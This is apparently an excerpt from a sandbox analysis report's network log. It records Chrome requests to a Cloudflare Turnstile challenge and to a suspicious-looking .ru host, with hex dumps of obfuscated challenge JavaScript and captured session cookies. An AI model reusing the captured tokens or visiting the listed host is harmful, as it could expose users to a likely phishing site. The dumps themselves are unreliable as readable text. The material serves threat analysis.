                                                                                                        Data Ascii: wrLNO':function(h,i){return h<i},'bcFdZ':function(h,i){return h(i)},'nrDYh':function(h,i){return h>i},'UIMGZ':function(h,i){return i&h},'lQcwN':function(h,i){return h(i)},'KfJuJ':function(h,i){return i!=h},'cUhJq':function(h,i){return i*h},'gomJf':functio
                                                                                                        2024-10-04 13:11:40 UTC1369INData Raw: 28 31 35 35 35 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 6a 47 28 34 37 30 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 6a 47 28 32 36 35 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 6a 47 28 31 33 34 35 29 5d 28 31 36 2c 78 29 3b 49 3d 64 5b 6a 47 28 33 35 31 29 5d 28 49 2c 31 29 7c 31 2e 35 32 26 4e 2c 64 5b 6a 47 28 31 33 36 39 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 6a 47 28 34 37 30 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 20 73 5b 6a 47 28 36 39 39 29 5d 28 4e 29 3b 45 2d 2d 2c 30 3d 3d 45 26 26 28 45 3d 4d 61 74 68 5b 6a 47 28 31 36 34 36 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c
                                                                                                        Data Ascii: (1555)](J,j-1)?(J=0,H[jG(470)](o(I)),I=0):J++,N=0,x++);for(N=D[jG(265)](0),x=0;d[jG(1345)](16,x);I=d[jG(351)](I,1)|1.52&N,d[jG(1369)](J,j-1)?(J=0,H[jG(470)](o(I)),I=0):J++,N>>=1,x++);}else s[jG(699)](N);E--,0==E&&(E=Math[jG(1646)](2,G),G++),delete C[D]}el


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        34192.168.2.1652644104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:40 UTC795OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:41 UTC210INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:41 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        cache-control: max-age=2629800, public
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b516bbf428e-EWR
                                                                                                        2024-10-04 13:11:41 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        35192.168.2.1649749188.114.97.34431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:41 UTC1331OUTGET /favicon.ico HTTP/1.1
                                                                                                        Host: 9wetjda.niavereinho.ru
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://9wetjda.niavereinho.ru/QTnArt4/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Cookie: XSRF-TOKEN=eyJpdiI6IjZiRnNtZGtDMWxSUUw4YmVUVUtsSGc9PSIsInZhbHVlIjoicjduYlRSWjlrUFB6WGNkR1BZazBWRXpZV21DTDhsZnBOSVVraVFsMVZnazVrNWFVTXorTEova2dpSmQ3NVQ5bmthN09JUDMxc1ZDck92WUF4ejJRb2k4K0c1ZjBCUWJ1STBwZitPZURJQ0NENXF6RjZ4Qml2eldya3BERi9qQmYiLCJtYWMiOiJlOTI2MDkzYWI1MzUxNDYyNDBjYmUwMWMzZjIxOTc3ZjAxZGUwYjkzMTY5ZGM2MTU1N2IwOGI3MGEyZDA5ZGZkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InNVM0F1alNnK1hTVVhWbGNOWHZxNUE9PSIsInZhbHVlIjoiY01pdkxvbFJMU0tKWkdqTHhJSkhoQUdiVndSc3RLOGFZODRJd1dDWHhrRFhGZ2plMjBDeGVSSEhVcGpBdmVtMFN5MldmaGwwcEtHcndhVC9xUmpQbVBnTThKUGM4R1lKTFA0bkJKZG1LOU1sMGRSQUVUekN0TU9DTkcwbnErSW0iLCJtYWMiOiJhNzk0NjYwMzg1MjBkYWU3MDdmYzg5MGQ0NjFhZGM2MmM5MTQwMmVmZTAxMDAzMzUyOWExM2JkOGYwZTcyYTYzIiwidGFnIjoiIn0%3D
                                                                                                        2024-10-04 13:11:41 UTC652INHTTP/1.1 404 Not Found
                                                                                                        Date: Fri, 04 Oct 2024 13:11:41 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=14400
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8w%2Bvwhx1y4kU1skquzdEMq2sWfTrENkggTrFExr4oHFIp94bo7K1Fl9qSv2s93b4wEwr7AKizzf%2Bf7I8UKOO4IaN1DpaaRW9mxCk2rnDAtZ3fFQb01x2H%2FDRaFXMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Vary: Accept-Encoding
                                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 8269
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b525e2a4397-EWR
                                                                                                        2024-10-04 13:11:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        36192.168.2.1652645104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:41 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cd56b4bca50423a&lang=auto HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:41 UTC301INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:41 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 123833
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b555cff4384-EWR
                                                                                                        2024-10-04 13:11:41 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 72 20 66 65 65 64 62 61 63 6b 20 72 65 70 6f 72 74 20 68 61 73 20 62 65 65 6e 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 73 75 62 6d 69 74 74 65 64 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f
                                                                                                        Data Ascii: r feedback report has been successfully submitted","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20pro
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 32 31 38 31 38 34 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 32 37 31 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 4a 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 67 4a 3d 67 49 2c 67 3d 7b 7d 2c 67 5b 67 4a 28 38 31 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 73 26 6e 7d 2c 67 5b 67 4a 28 36 33 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 73 5e 6e 7d 2c 67 5b 67 4a 28 31 33 36 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2d 73 7d 2c 67 5b
                                                                                                        Data Ascii: ak;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,218184),eM=this||self,eN=eM[gI(271)],eO=function(f,gJ,g,h,i,j,k,l,m){for(gJ=gI,g={},g[gJ(810)]=function(n,s){return s&n},g[gJ(633)]=function(n,s){return s^n},g[gJ(1365)]=function(n,s){return n-s},g[
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 29 5d 5b 30 5d 2b 2b 29 2d 32 30 34 2c 32 35 36 29 26 32 35 35 2e 37 37 5e 32 32 32 2c 74 68 69 73 2e 68 5b 76 5b 67 4e 28 39 38 39 29 5d 28 42 2c 74 68 69 73 2e 67 29 5d 3d 44 5b 43 5d 2e 6c 3b 65 6c 73 65 20 69 66 28 76 5b 67 4e 28 31 31 31 32 29 5d 28 32 34 36 2c 42 29 29 7b 66 6f 72 28 42 3d 30 3b 76 5b 67 4e 28 31 33 35 35 29 5d 28 42 2c 43 29 3b 45 3d 67 28 74 68 69 73 29 2c 46 3d 7b 7d 2c 46 2e 6c 3d 76 6f 69 64 20 30 2c 44 5b 45 5d 3d 46 2c 42 2b 2b 29 3b 7d 7d 29 2c 66 3d 65 4d 5b 67 4a 28 32 38 33 29 5d 28 66 29 2c 6b 3d 5b 5d 2c 69 3d 2d 31 3b 21 69 73 4e 61 4e 28 6d 3d 66 5b 67 4a 28 38 34 31 29 5d 28 2b 2b 69 29 29 3b 6b 5b 67 4a 28 31 30 35 33 29 5d 28 53 74 72 69 6e 67 5b 67 4a 28 31 32 36 31 29 5d 28 68 5b 67 4a 28 32 33 32 29 5d 28 68 5b
                                                                                                        Data Ascii: )][0]++)-204,256)&255.77^222,this.h[v[gN(989)](B,this.g)]=D[C].l;else if(v[gN(1112)](246,B)){for(B=0;v[gN(1355)](B,C);E=g(this),F={},F.l=void 0,D[E]=F,B++);}}),f=eM[gJ(283)](f),k=[],i=-1;!isNaN(m=f[gJ(841)](++i));k[gJ(1053)](String[gJ(1261)](h[gJ(232)](h[
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 5b 68 6a 28 33 36 34 29 5d 28 27 7c 27 29 2c 6d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6c 5b 6d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6e 3d 67 64 5b 68 6a 28 34 32 31 29 5d 28 78 29 5b 68 6a 28 38 34 33 29 5d 28 27 2b 27 2c 68 6a 28 35 37 34 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 6f 3d 65 4d 5b 68 6a 28 31 30 36 38 29 5d 5b 68 6a 28 38 39 36 29 5d 3f 6b 5b 68 6a 28 37 36 33 29 5d 28 27 68 2f 27 2b 65 4d 5b 68 6a 28 31 30 36 38 29 5d 5b 68 6a 28 38 39 36 29 5d 2c 27 2f 27 29 3a 27 27 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 42 5b 68 6a 28 31 35 37 30 29 5d 3d 32 35 30 30 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 78 3d 28 73 3d 7b 7d 2c 73 5b 68 6a 28 37 35 33 29 5d 3d 67 2c 73 2e 63 63 3d 68 2c 73
                                                                                                        Data Ascii: [hj(364)]('|'),m=0;!![];){switch(l[m++]){case'0':n=gd[hj(421)](x)[hj(843)]('+',hj(574));continue;case'1':o=eM[hj(1068)][hj(896)]?k[hj(763)]('h/'+eM[hj(1068)][hj(896)],'/'):'';continue;case'2':B[hj(1570)]=2500;continue;case'3':x=(s={},s[hj(753)]=g,s.cc=h,s
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 35 31 29 2b 67 2c 6a 5b 68 6b 28 37 34 30 29 5d 28 68 6b 28 36 36 34 29 2c 4a 53 4f 4e 5b 68 6b 28 31 36 39 34 29 5d 28 68 29 29 5d 5b 68 6b 28 38 37 35 29 5d 28 68 6b 28 37 36 36 29 29 2c 65 4d 5b 68 6b 28 39 35 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 6d 2c 73 29 7b 28 68 6d 3d 68 6b 2c 68 6d 28 39 39 33 29 21 3d 3d 68 6d 28 39 39 33 29 29 3f 28 73 3d 66 5b 68 6d 28 31 33 30 31 29 5d 28 67 5b 68 6d 28 31 34 38 30 29 5d 29 2c 73 5b 68 6d 28 31 35 32 39 29 5d 26 26 28 69 3d 73 5b 68 6d 28 31 35 32 39 29 5d 29 29 3a 65 4d 5b 68 6d 28 37 36 31 29 5d 28 6d 2c 75 6e 64 65 66 69 6e 65 64 2c 6a 5b 68 6d 28 31 30 39 32 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 68 6b 28 39 35 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 6e 29 7b 68 6e 3d 68 6b 2c 65 4d 5b 68 6e 28 38 36
                                                                                                        Data Ascii: 51)+g,j[hk(740)](hk(664),JSON[hk(1694)](h))][hk(875)](hk(766)),eM[hk(955)](function(hm,s){(hm=hk,hm(993)!==hm(993))?(s=f[hm(1301)](g[hm(1480)]),s[hm(1529)]&&(i=s[hm(1529)])):eM[hm(761)](m,undefined,j[hm(1092)])},10),eM[hk(955)](function(hn){hn=hk,eM[hn(86
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 37 29 5d 3d 66 56 2c 67 32 5b 67 49 28 31 35 34 36 29 5d 3d 66 57 2c 67 32 5b 67 49 28 38 33 39 29 5d 3d 66 52 2c 67 32 5b 67 49 28 31 36 38 33 29 5d 3d 66 58 2c 67 32 5b 67 49 28 31 31 35 34 29 5d 3d 66 55 2c 67 32 5b 67 49 28 31 30 36 30 29 5d 3d 66 54 2c 67 32 5b 67 49 28 35 32 39 29 5d 3d 66 66 2c 67 32 5b 67 49 28 31 33 36 36 29 5d 3d 66 50 2c 67 32 5b 67 49 28 35 36 31 29 5d 3d 66 4f 2c 67 32 5b 67 49 28 31 36 39 39 29 5d 3d 66 37 2c 67 32 5b 67 49 28 35 32 34 29 5d 3d 66 75 2c 67 32 5b 67 49 28 31 34 31 32 29 5d 3d 66 76 2c 67 32 5b 67 49 28 31 36 35 30 29 5d 3d 66 46 2c 67 32 5b 67 49 28 31 31 30 35 29 5d 3d 66 45 2c 67 32 5b 67 49 28 34 34 33 29 5d 3d 66 44 2c 67 32 5b 67 49 28 31 33 31 39 29 5d 3d 66 43 2c 67 32 5b 67 49 28 35 39 33 29 5d 3d 66
                                                                                                        Data Ascii: 7)]=fV,g2[gI(1546)]=fW,g2[gI(839)]=fR,g2[gI(1683)]=fX,g2[gI(1154)]=fU,g2[gI(1060)]=fT,g2[gI(529)]=ff,g2[gI(1366)]=fP,g2[gI(561)]=fO,g2[gI(1699)]=f7,g2[gI(524)]=fu,g2[gI(1412)]=fv,g2[gI(1650)]=fF,g2[gI(1105)]=fE,g2[gI(443)]=fD,g2[gI(1319)]=fC,g2[gI(593)]=f
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 32 35 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29 29 3a 6f 5b 6a 37 28 31 34 39 37 29 5d 28 73 2c 69 2b 44 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 6a 36 29 7b 6a 36 3d 62 2c 4f 62 6a 65 63 74 5b 6a 36 28 31 35 30 35 29 5d 5b 6a 36 28 33 37 35 29 5d 5b 6a 36 28 31 37 31 31 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 6a 36 28 31 30 35 33 29 5d 28 47 29 7d 7d 2c 67 38 3d 67 49 28 37 31 34 29 5b 67 49 28 33 36 34 29 5d 28 27 3b 27 29 2c 67 39 3d 67 38 5b 67 49 28 34 31 35 29 5d 5b 67 49 28 35 36 33 29 5d 28 67 38 29 2c 65 4d 5b 67 49 28 31 33 38 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 6a 39 2c 69 2c 6a 2c 6b 2c 78 2c 42 2c 43 2c 6c 2c 6d 29 7b 66 6f 72 28 6a 39 3d 67
                                                                                                        Data Ascii: 25)](i,D),h[D])):o[j7(1497)](s,i+D,E),C++);return j;function s(G,H,j6){j6=b,Object[j6(1505)][j6(375)][j6(1711)](j,H)||(j[H]=[]),j[H][j6(1053)](G)}},g8=gI(714)[gI(364)](';'),g9=g8[gI(415)][gI(563)](g8),eM[gI(1382)]=function(g,h,j9,i,j,k,x,B,C,l,m){for(j9=g
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 5a 7a 6c 46 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 41 42 44 65 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 52 62 63 73 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 6d 62 44 73 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 7a 4c 78 46 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 58 6c 50 79 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 78 56 74 57 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e
                                                                                                        Data Ascii: (h,i){return i|h},'ZzlFi':function(h,i){return h<<i},'ABDeR':function(h,i){return i==h},'RbcsY':function(h,i){return h-i},'mbDsq':function(h,i){return h<i},'zLxFR':function(h,i){return i!==h},'XlPyn':function(h,i){return h(i)},'xVtWK':function(h,i){return
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 28 31 35 30 35 29 5d 5b 6a 6e 28 33 37 35 29 5d 5b 6a 6e 28 31 37 31 31 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 6a 6e 28 38 34 31 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 6a 6e 28 31 30 35 33 29 5d 28 64 5b 6a 6e 28 31 36 31 38 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 6a 6e 28 38 34 31 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 6a 6e 28 35 30 30 29 5d 28 38 2c 73 29 3b 48 3d 64 5b 6a 6e 28 31 34 36 39 29 5d 28 48 3c 3c 31 2c 4d 26 31 2e 39 33 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 6a 6e 28 31 30 35 33 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72
                                                                                                        Data Ascii: (1505)][jn(375)][jn(1711)](B,C)){if(256>C[jn(841)](0)){for(s=0;s<F;H<<=1,I==j-1?(I=0,G[jn(1053)](d[jn(1618)](o,H)),H=0):I++,s++);for(M=C[jn(841)](0),s=0;d[jn(500)](8,s);H=d[jn(1469)](H<<1,M&1.93),I==j-1?(I=0,G[jn(1053)](o(H)),H=0):I++,M>>=1,s++);}else{for


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        37192.168.2.165264635.190.80.14431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:41 UTC541OUTOPTIONS /report/v4?s=v8w%2Bvwhx1y4kU1skquzdEMq2sWfTrENkggTrFExr4oHFIp94bo7K1Fl9qSv2s93b4wEwr7AKizzf%2Bf7I8UKOO4IaN1DpaaRW9mxCk2rnDAtZ3fFQb01x2H%2FDRaFXMg%3D%3D HTTP/1.1
                                                                                                        Host: a.nel.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Origin: https://9wetjda.niavereinho.ru
                                                                                                        Access-Control-Request-Method: POST
                                                                                                        Access-Control-Request-Headers: content-type
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:41 UTC336INHTTP/1.1 200 OK
                                                                                                        Content-Length: 0
                                                                                                        access-control-max-age: 86400
                                                                                                        access-control-allow-methods: OPTIONS, POST
                                                                                                        access-control-allow-origin: *
                                                                                                        access-control-allow-headers: content-type, content-length
                                                                                                        date: Fri, 04 Oct 2024 13:11:41 GMT
                                                                                                        Via: 1.1 google
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        38192.168.2.1652647104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:41 UTC925OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/868862447:1728044727:Gz7Dl8mZdZr0DP9Q4Zh7hrsdOMaLwCsED9HAlqQ_3D4/8cd56b4bca50423a/c1fc4ecc24bba50 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 2727
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: c1fc4ecc24bba50
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
